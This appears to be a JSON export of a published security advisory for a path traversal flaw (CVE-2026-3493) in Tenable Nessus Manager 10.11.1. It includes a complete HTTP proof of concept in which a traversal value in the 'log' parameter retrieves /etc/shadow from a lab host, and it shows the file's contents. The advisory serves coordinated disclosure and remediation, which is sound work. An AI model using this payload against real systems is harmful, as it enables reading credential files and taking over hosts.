{"id":25015,"date":"2026-03-30T09:05:32","date_gmt":"2026-03-30T07:05:32","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=25015"},"modified":"2026-04-08T13:33:04","modified_gmt":"2026-04-08T11:33:04","slug":"usd-2026-003","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2026-003\/","title":{"rendered":"usd-2026-003"},"content":{"rendered":"<p>[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.6\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<\/p>\n<h1>usd-2026-003 | Tenable Nessus Manager 10.11.1 - Path Traversal (CWE-35)<\/h1>\n<h1><\/h1>\n<p><strong>Product<\/strong>: Tenable Nessus Manager<br \/>\n<strong>Affected Version<\/strong>: 10.11.1<br \/>\n<strong>Vulnerability Type<\/strong>: Path Traversal (CWE-35)<br \/>\n<strong>Security Risk<\/strong>: High<br \/>\n<strong>Vendor<\/strong>: Tenable<br \/>\n<strong>Vendor URL<\/strong>: <a href=\"https:\/\/www.tenable.com\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.tenable.com\/<\/a><a href=\"https:\/\/www.tenable.com\/\" title=\"https:\/\/www.tenable.com\/\" target=\"_blank\" rel=\"noopener\"> <\/a><br \/>\n<strong>Vendor acknowledged vulnerability<\/strong>: Yes<br \/>\n<strong>Vendor Status<\/strong>: Fixed<br \/>\n<strong>CVE Number<\/strong>: CVE-2026-3493<br \/>\n<strong>CVE Link<\/strong>: <a href=\"https:\/\/www.cve.org\/CVERecord?id=CVE-2026-3493\" target=\"_blank\" rel=\"noopener\">https:\/\/www.cve.org\/CVERecord?id=CVE-2026-3493<\/a><br \/>\n<strong>Advisory ID<\/strong>: usd-2026-003<\/p>\n<h3>Description<\/h3>\n<p>Tenable Nessus Manager is a vulnerability management platform designed to centrally coordinate vulnerability scanning. It provides a management layer for orchestrating scanners and administering Nessus Agents. Nessus Manager can remotely manage, update, and configure linked agents.<br \/>\nOnce agents are linked, they receive scan instructions from the manager, perform assessments locally on the host system, and send results back to the manager.<\/p>\n<p>Nessus Manager also provides functionality for retrieving logs from linked agents. Administrators can request agent logs, after which the agents push their log data back to the manager, where the collected logs can then be downloaded for analysis.<\/p>\n<p>The log download mechanism contains a path traversal vulnerability that allows administrative users to navigate outside the intended directories and download arbitrary files from the managers underlying operating system.<\/p>\n<h3>Proof of Concept<\/h3>\n<p><!-- describe how the vulnerability can be exploited, feel free to add supporting images etc. -->The <strong>log<\/strong> parameter in the POST request to <strong>\/agents\/x\/download-log<\/strong> can be exploited to access arbitrary files through path traversal, as illustrated in the sample request below:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">POST<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/agents\/4\/download-log<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">192.168.213.133:8834<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Ch-Ua-Platform<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">\"Linux\"<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept-Language<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">en-US,en;q=0.9<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Ch-Ua<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">\"Not=A?Brand\";v=\"24\", \"Chromium\";v=\"140\"<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Cookie<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">token=187972135c67f529687c2490376cdc6989131f7d0655d362<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Ch-Ua-Mobile<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">?0<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">User-Agent<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/140.0.0.0 Safari\/537.36<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/json<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">*\/*<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Fetch-Site<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">same-origin<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Fetch-Mode<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">cors<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Sec-Fetch-Dest<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">empty<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Referer<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">[https:\/\/192.168.213.133:8834\/]()<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Accept-Encoding<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">gzip, deflate, br<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Priority<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">u=1, i<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Connection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">keep-alive<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">58<\/span>\n\n\n\n<span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"log\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}<\/span>\n<\/pre>\n<\/div>\n<p>The response contains a one-time token issued for this specific request.<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cache-Control<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">no-cache, no-store, must-revalidate<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Frame-Options<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">DENY<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/json<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Connection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">close<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-XSS-Protection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">1; mode=block<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">NessusWWW<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Content-Type-Options<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">nosniff<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Tue, 24 Feb 2026 13:44:28 GMT<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">76<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Security-Policy<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src [https:\/\/store.tenable.com;]() default-src 'self'; connect-src 'self' data.nessus-telemetry.tenable.com content.nessus-telemetry.tenable.com www.tenable.com; script-src 'self' content.nessus-telemetry.tenable.com www.tenable.com; img-src 'self' data: content.nessus-telemetry.tenable.com data.nessus-telemetry.tenable.com; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Strict-Transport-Security<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">max-age=31536000; includeSubDomains<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Expires<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">0<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Expect-CT<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">max-age=0<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Pragma<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">no-cache<\/span>\n\n\n\n<span class=\"p\" style=\"background: #263238;color: #89ddff\">{<\/span><span class=\"nt\" style=\"background: #263238;color: #ff5370\">\"token\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">:<\/span><span class=\"s2\" style=\"background: #263238;color: #c3e88d\">\"21c09c96065f900cfb1d6c2f3cf548a1950578fe55b3b7cfaa7a8b5581c80c14\"<\/span><span class=\"p\" style=\"background: #263238;color: #89ddff\">}<\/span>\n<\/pre>\n<\/div>\n<p>The token can then be used to perform a one-time download via the following GET request:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"nf\" style=\"background: #263238;color: #82aaff\">GET<\/span> <span class=\"nn\" style=\"background: #263238;color: #ffcb6b\">\/tokens\/21c09c96065f900cfb1d6c2f3cf548a1950578fe55b3b7cfaa7a8b5581c80c14\/download<\/span> <span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Host<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">192.168.213.133:8834<\/span>\n<span class=\"err\" style=\"background: #263238;color: #ff5370\">[...]<\/span>\n<\/pre>\n<\/div>\n<p>As a result, the content of the <strong>\/etc\/shadow<\/strong> file are displayed in the servers response:<\/p>\n<div class=\"codehilite\" style=\"background: #263238;color: #eff\">\n<pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"kr\" style=\"background: #263238;color: #bb80b3\">HTTP<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">\/<\/span><span class=\"m\" style=\"background: #263238;color: #f78c6c\">1.1<\/span> <span class=\"m\" style=\"background: #263238;color: #f78c6c\">200<\/span> <span class=\"ne\" style=\"background: #263238;color: #ffcb6b\">OK<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Disposition<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">attachment; filename=\"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow\"<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Cache-Control<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">no-cache, no-store, must-revalidate<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Frame-Options<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">DENY<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Type<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">application\/octet-stream<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Connection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">close<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-XSS-Protection<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">1; mode=block<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Server<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">NessusWWW<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Date<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">Tue, 24 Feb 2026 13:44:35 GMT<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">X-Content-Type-Options<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">nosniff<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Security-Policy<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src [https:\/\/store.tenable.com;]() default-src 'self'; connect-src 'self' data.nessus-telemetry.tenable.com content.nessus-telemetry.tenable.com www.tenable.com; script-src 'self' content.nessus-telemetry.tenable.com www.tenable.com; img-src 'self' data: content.nessus-telemetry.tenable.com data.nessus-telemetry.tenable.com; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self';<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Strict-Transport-Security<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">max-age=31536000; includeSubDomains<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Expect-CT<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">max-age=0<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Expires<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">0<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Pragma<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">no-cache<\/span>\n<span class=\"na\" style=\"background: #263238;color: #bb80b3\">Content-Length<\/span><span class=\"o\" style=\"background: #263238;color: #89ddff\">:<\/span> <span class=\"l\" style=\"background: #263238;color: #c3e88d\">833<\/span>\n\nroot:!::0:99999:7:::\nbin:*:19447:0:99999:7:::\ndaemon:*:19447:0:99999:7:::\nadm:*:19447:0:99999:7:::\nlp:*:19447:0:99999:7:::\nsync:*:19447:0:99999:7:::\nshutdown:*:19447:0:99999:7:::\nhalt:*:19447:0:99999:7:::\nmail:*:19447:0:99999:7:::\noperator:*:19447:0:99999:7:::\ngames:*:19447:0:99999:7:::\nftp:*:19447:0:99999:7:::\nnobody:*:19447:0:99999:7:::\ndbus:!!:20487::::::\nsystemd-coredump:!!:20487::::::\nsystemd-resolve:!!:20487::::::\ntss:!!:20487::::::\npolkitd:!!:20487::::::\nclevis:!!:20487::::::\nunbound:!!:20487::::::\nsshd:!!:20487::::::\nsetroubleshoot:!!:20487::::::\ncockpit-ws:!!:20487::::::\ncockpit-wsinstance:!!:20487::::::\npcp:!!:20487::::::\nsssd:!!:20487::::::\nchrony:!!:20487::::::\ntcpdump:!!:20487::::::\nadmin:$6$[REDACTED]:20487:0:99999:7:::\n<\/pre>\n<\/div>\n<h3>Fix<\/h3>\n<p>It is recommended to implement strict input validation and sanitization on the log parameter to prevent path traversal attacks. The application should restrict the parameter to a predefined set of valid log filenames or enforce resolution within a designated log directory. Input should be normalized to its canonical form, and any requests containing traversal sequences (e.g., <strong>..\/<\/strong>) should be explicitly rejected.<\/p>\n<h3>References<\/h3>\n<ul>\n<li><a href=\"https:\/\/owasp.org\/www-community\/attacks\/Path_Traversal\" target=\"_blank\" rel=\"noopener\">https:\/\/owasp.org\/www-community\/attacks\/Path_Traversal<\/a><\/li>\n<li><a href=\"https:\/\/de.tenable.com\/products\/nessus\" target=\"_blank\" rel=\"noopener\">https:\/\/de.tenable.com\/products\/nessus<\/a><\/li>\n<li><a href=\"https:\/\/www.tenable.com\/security\/tns-2026-08\" target=\"_blank\" rel=\"noopener\">https:\/\/www.tenable.com\/security\/tns-2026-08<\/a><\/li>\n<\/ul>\n<h3>Timeline<\/h3>\n<ul>\n<li><strong>2026-02-24<\/strong>: First contact request via Hackerone<\/li>\n<li><strong>2026-02-25<\/strong>: Vulnerability confirmed as valid<\/li>\n<li><strong>2026-03-03<\/strong>: Nessus Manager 10.10.3 and 10.11.3 released<\/li>\n<li><strong>2026-03-30<\/strong>: Advisory published<\/li>\n<\/ul>\n<h3>Credits<\/h3>\n<p>This security vulnerability was identified by Ole Wagner of usd AG.[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>usd-2026-003 | Tenable Nessus Manager 10.11.1 - Path Traversal (CWE-35) Product: Tenable Nessus Manager Affected Version: 10.11.1 Vulnerability Type: Path Traversal (CWE-35) Security Risk: High Vendor: Tenable Vendor URL: https:\/\/www.tenable.com\/ Vendor acknowledged vulnerability: Yes Vendor Status: Fixed CVE Number: CVE-2026-3493 CVE Link: https:\/\/www.cve.org\/CVERecord?id=CVE-2026-3493 Advisory ID: usd-2026-003 Description Tenable Nessus Manager is a vulnerability management platform [&hellip;]<\/p>\n","protected":false},"author":118,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-25015","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25015","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=25015"}],"version-history":[{"count":5,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25015\/revisions"}],"predecessor-version":[{"id":25092,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/25015\/revisions\/25092"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=25015"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}